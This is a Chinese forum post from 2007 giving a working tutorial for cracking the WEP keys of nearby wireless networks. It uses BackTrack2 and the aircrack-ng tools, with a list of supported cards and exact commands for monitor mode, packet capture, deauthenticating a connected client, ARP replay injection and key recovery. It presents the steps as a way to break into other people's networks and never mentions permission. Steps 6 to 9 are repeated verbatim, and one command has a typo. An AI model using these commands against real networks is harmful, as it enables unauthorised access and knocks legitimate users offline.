|
今日有空,结合老外贴子,做个破解WEP教程,对自己原贴进行补充细化,请大家指教,转载请注明出处. 1、 要破解WEP,首先要确认你周围有没有WEP加密的AP,连WEP网络都没有你就不要谈什么破解了,要查找WEP网络可以用netstumbler探查,但这个软件对于所有加密它都显示为WEP,准确率不高,大家要注意一下。 2、 下载backtrack2,地址在回贴中可找到,可下载最新版。用iso文件刻成光盘。在BIOS中将电脑设为光驱起动。用刻好的光盘放入光驱中,启动电脑,进入linux画面,用户名root ,密码toor,输入显示命令startx,可以完成系统运行,如果在输入后出现黑屏,重新启动电脑,在输入用户名和密码后,输入xconf,显卡自动配置命令,再输入startx,即可启动系统。 3、 确认你的网卡是否被backtrack2所支持。在命令对话框内输入 ifconfig -a 查看自己网卡的型号,接口 4、 以下是已确认可以支持的网卡 -----PCMCIA Cards
1 3COM 3CRWE154G72 v1
2 AirLink101 AWLC4130
3 ASUS WL100G
4 Belkin F5D7010 V1000
5 Belkin F5D7010 V5000
6 Belkin F5D7010 V6000
7 Belkin F5D7011
8 Buffalo WLI-CB-G54HP
9 Cisco AIR-PCM350
10 Cisco Aironet AIR-CB21AG-A-K9
11 Dlink DWL-650+
12 Dlink DWL-G650
13 Dlink DWL-G650M
14 Dlink DWL-G650+
15 D-Link WNA-1330
16 Linksys WPC54G v3
17 NetGear MA401
18 NetGear WPN511
19 NetGear WG511T
20 NetGear WAG511v2
21 NetGear WG511 v1
22 NetGear WPN511GR
23 PROXIM ORiNOCO 802.11b/g Gold (Model: 8470-WD)
24 Senao NL-2511CD PLUS EXT2
25 Senao Sl-2511CD Plus EXT2
26 SMC 2532W-B
27 SMC WCB-G
28 SWEEX LW051 ver:1.0
29 TP-link SuperG&eXtended Range 108M Wireless Cardbus Adapter(TL-WN610G)
30 Ubiquiti SRC
31 Wistron WLAN 802.11a/b/g Cardbus CB9-GP
32 X-Micro WLAN 11g PCMCIA Card (XWL-11GPAG)
33 ZCom XI-325HP+
34 Zyxel ZyAIR G-100 PCMCIA Card (FCC ID:N89-WE601l) ----USB Card
1 ALFA Networks AWUS036H
2 ASUS WL-167G
3 AVM Fritz!Wlan USB V1.1
4 Buffalo Airstation G54 WLI-U2-KG54-AI (2A)
5 Chiefmax
6 D-Link DWL 122 (USB) F/W 3.2.1 H/W A1
7 D-Link DWL G122 (USB) F/W 2.03 B1
8 D-Link WUA-1340
9 Edimax EW-7318USG
10 Linksys WUSB54g v4
11 Linksys WUSB54GC
12 NetGear WG111v2
13 NetGear WG111T
14 Netopia ter/gusb-e
15 SafeCom SWMULZ-5400
16 ZyDAS 1211 5、 找到kismet菜单,点击运行,选择临时文件夹,选择网卡接口,如WIFI0,启动KISMET,在窗口中一个个AP全部露出真容,就是选择不广播SSID的,一会儿也显了出来,看看各AP的加密方式,选择WEP加密的,用笔记下来他的名称,mac,按键对窗口进行整理,再按上下键选择将要破解的的AP,按C键,可以查看这个AP的客户端,记下该客户端的MAC。 如果确认有客户端,破解进程很快。 如果没有客户端,破解方法有点不同,需要两台电脑,同时进行,我没有试过,不过有一个网友高手已试过,二十分钟也成功破解。 6.找到airmon菜单,在窗口中输入命令如下 airmon-ng start wifi0 6 注:其中wifi后面为对应要破解的频道 再输入 wlanconfig ath0 destroy 注:其中ath0替换为你的网卡接口 再输入 ifxonfig ath1 up 注:其中ath1替换为你的网卡监听接口 再输入 iwconfig ath1 mode monitor channel 6 注:channel 后面跟的是你要破解的频道,ath1替换为你的网卡的监听接口 7.上面窗口不关闭,另找到airodump窗口 输入命令 airodump-ng --ivs -w name -c 6 ath1 注:airodump-ng为抓包命令,--ivs 只抓包wep包,光盘驱动,内存有限,用此项节省内存,-w后面跟的是保存文件的名称,实际保存名称会变成name-01.ivs,-c后面跟的是你要破解的频道,ath1为你的网卡监听接口 这时你会发现电脑会打开一个抓包窗口,显示出AP名称,mac地址,如果有客户端将在下面显示出来,在station下面是客户端的mac,这个客户端一定要和你要破解的ap对应,记下他们,这些应和kismet找到的一致. 8.上面窗口不关闭,另找到aireplay菜单 输入命令 aireplay-ng -0 10 -a ap的mac -c 客户端的mac ath1 输入此命令攻击客户端让他掉线重连以便产生ARP请求,这两个mac地址一定要正确,ath1替换为你的网卡监听接口 再输入 aireplay-ng -3 -b ap的mac -h 客户端的mac ath1 这个语句用来抓包,找到合适的包,就开如发攻击包 这时如果攻击成功的话,你会看airodump窗口的date不住增长 在包增加到一万以上,不关闭以上窗口,另找到aircrack窗口 9.输入命令如下 aircrack-ng -n 64 -b ap的mac name-01.ivs -n后面跟破解Wep是64位还是128位,文件名称可以输入ls命令查看,以实际为准. 好了,数分钟之后,密码就会出现在你面前.
6.找到airmon菜单,在窗口中输入命令如下 airmon-ng start wifi0 6 注:其中wifi后面为对应要破解的频道 再输入 wlanconfig ath0 destroy 注:其中ath0替换为你的网卡接口 再输入 ifxonfig ath1 up 注:其中ath1替换为你的网卡监听接口 再输入 iwconfig ath1 mode monitor channel 6 注:channel 后面跟的是你要破解的频道,ath1替换为你的网卡的监听接口 7.上面窗口不关闭,另找到airodump窗口 输入命令 airodump-ng --ivs -w name -c 6 ath1 注:airodump-ng为抓包命令,--ivs 只抓包wep包,光盘驱动,内存有限,用此项节省内存,-w后面跟的是保存文件的名称,实际保存名称会变成name-01.ivs,-c后面跟的是你要破解的频道,ath1为你的网卡监听接口 这时你会发现电脑会打开一个抓包窗口,显示出AP名称,mac地址,如果有客户端将在下面显示出来,在station下面是客户端的mac,这个客户端一定要和你要破解的ap对应,记下他们,这些应和kismet找到的一致. 8.上面窗口不关闭,另找到aireplay菜单 输入命令 aireplay-ng -0 10 -a ap的mac -c 客户端的mac ath1 输入此命令攻击客户端让他掉线重连以便产生ARP请求,这两个mac地址一定要正确,ath1替换为你的网卡监听接口 再输入 aireplay-ng -3 -b ap的mac -h 客户端的mac ath1 这个语句用来抓包,找到合适的包,就开如发攻击包 这时如果攻击成功的话,你会看airodump窗口的date不住增长 在包增加到一万以上,不关闭以上窗口,另找到aircrack窗口 9.输入命令如下 aircrack-ng -n 64 -b ap的mac name-01.ivs -n后面跟破解Wep是64位还是128位,文件名称可以输入ls命令查看,以实际为准. 好了,数分钟之后,密码就会出现在你面前.
[此贴子已经被tange于2007-7-23 18:59:19编辑过] | 
IP卡
狗仔卡
发表于 2007-6-30 20:57
显身卡
发表于 2007-7-23 19:02
